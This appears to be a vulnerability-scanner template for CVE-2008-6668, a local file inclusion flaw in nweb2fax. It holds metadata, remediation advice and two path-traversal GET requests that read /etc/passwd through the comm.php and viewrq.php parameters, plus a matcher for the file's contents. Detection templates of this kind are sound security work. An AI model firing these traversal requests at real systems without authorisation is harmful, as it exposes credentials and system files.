id: CVE-2008-6668 info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/5856 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 epss-percentile: 0.72128 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dirk_bartley product: nweb2fax tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley http: - method: GET path: - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502210093d53a44e7670ae91340f32f011a1cf3d1a356b259d38839794f5af89b77d20802200ece4f4130a9a1e17e778ea393395611a46cc9af56a222985f4e148afc9159e7:922c64590222798bb761d5b6d8e72950